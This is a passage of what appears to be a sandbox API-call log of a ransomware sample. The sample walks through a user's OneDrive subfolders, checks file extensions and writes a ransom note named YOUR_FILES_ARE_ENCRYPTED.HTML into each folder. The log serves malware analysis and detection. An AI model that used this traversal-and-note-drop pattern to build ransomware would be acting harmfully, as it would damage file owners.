pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.102] GetProcessHeap () returned 0x600000 [0113.102] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\nl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.103] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.104] CloseHandle (hObject=0x32c) returned 1 [0113.104] GetProcessHeap () returned 0x600000 [0113.104] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.104] GetProcessHeap () returned 0x600000 [0113.104] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.104] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e80018f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e80018f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e80018f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nn-no", cAlternateFileName="")) returned 1 [0113.104] StrStrIW (lpFirst="nn-no", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.104] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nn-no") returned 81 [0113.104] GetProcessHeap () returned 0x600000 [0113.104] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.104] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nn-no" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nn-no") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nn-no" [0113.104] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nn-no", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nn-no\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nn-no\\*" [0113.104] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nn-no\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e80018f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e80018f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ea3c6d9, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.105] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e80018f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e80018f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ea3c6d9, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.105] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ea3c6d9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ea3c6d9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ebe02eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.105] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.105] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nn-no\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.105] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.105] lstrlenW (lpString=".mui") returned 4 [0113.105] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.105] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ea3c6d9, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ea3c6d9, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ebe02eb, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x14cc0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.105] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0113.105] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nn-no\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.105] GetProcessHeap () returned 0x600000 [0113.105] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nn-no\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\nn-no\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.105] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.106] CloseHandle (hObject=0x32c) returned 1 [0113.106] GetProcessHeap () returned 0x600000 [0113.106] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.106] GetProcessHeap () returned 0x600000 [0113.106] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.107] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ec78c0d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ec78c0d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ec78c0d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="nso-za", cAlternateFileName="")) returned 1 [0113.107] StrStrIW (lpFirst="nso-za", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.107] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nso-za") returned 82 [0113.107] GetProcessHeap () returned 0x600000 [0113.107] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.109] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nso-za" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nso-za") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nso-za" [0113.109] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nso-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nso-za\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nso-za\\*" [0113.109] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nso-za\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ec78c0d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ec78c0d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5f222205, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0113.109] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ec78c0d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ec78c0d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5f222205, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.110] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f222205, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5f222205, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5fc90822, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x16cc0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.110] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.110] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nso-za\\FileSync.LocalizedResources.dll.mui") returned 118 [0113.110] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.110] lstrlenW (lpString=".mui") returned 4 [0113.110] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.110] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f222205, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5f222205, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5fc90822, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x16cc0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.110] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0113.110] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nso-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0113.110] GetProcessHeap () returned 0x600000 [0113.110] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\nso-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\nso-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.111] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.112] CloseHandle (hObject=0x32c) returned 1 [0113.112] GetProcessHeap () returned 0x600000 [0113.112] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.112] GetProcessHeap () returned 0x600000 [0113.112] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.113] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x518475c3, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x518475c3, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x519eadfe, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x5d4c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="OneDrive.exe", cAlternateFileName="")) returned 1 [0113.113] StrStrIW (lpFirst="OneDrive.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.113] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\OneDrive.exe") returned 88 [0113.113] PathFindExtensionW (pszPath="OneDrive.exe") returned=".exe" [0113.113] lstrlenW (lpString=".exe") returned 4 [0113.113] PathFindExtensionW (pszPath="OneDrive.exe") returned=".exe" [0113.113] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ff65328, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ff65328, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5ff65328, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="or-in", cAlternateFileName="")) returned 1 [0113.113] StrStrIW (lpFirst="or-in", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.113] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\or-in") returned 81 [0113.113] GetProcessHeap () returned 0x600000 [0113.113] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.114] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\or-in" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\or-in") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\or-in" [0113.114] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\or-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\or-in\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\or-in\\*" [0113.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\or-in\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ff65328, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ff65328, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60e25c42, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626638 [0113.115] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5ff65328, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5ff65328, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60e25c42, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.115] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60e25c42, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60e25c42, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6129e362, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.115] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.115] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\or-in\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.115] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.115] lstrlenW (lpString=".mui") returned 4 [0113.115] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.115] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60e25c42, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60e25c42, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6129e362, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.115] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0113.115] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\or-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.115] GetProcessHeap () returned 0x600000 [0113.115] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\or-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\or-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0113.116] WriteFile (in: hFile=0x32c, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.117] CloseHandle (hObject=0x32c) returned 1 [0113.117] GetProcessHeap () returned 0x600000 [0113.117] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.117] GetProcessHeap () returned 0x600000 [0113.117] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.119] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61e63d2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61e63d2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61e63d2f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="pa", cAlternateFileName="")) returned 1 [0113.119] StrStrIW (lpFirst="pa", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.119] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa") returned 78 [0113.119] GetProcessHeap () returned 0x600000 [0113.119] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.121] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa" [0113.121] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa\\*" [0113.121] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\pa\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61e63d2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61e63d2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x620c61fa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName=".", cAlternateFileName="")) returned 0x626638 [0113.122] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61e63d2f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61e63d2f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x620c61fa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="..", cAlternateFileName="")) returned 1 [0113.123] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x620c61fa, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x620c61fa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6247ff69, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x34c08e6, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.123] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.123] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: 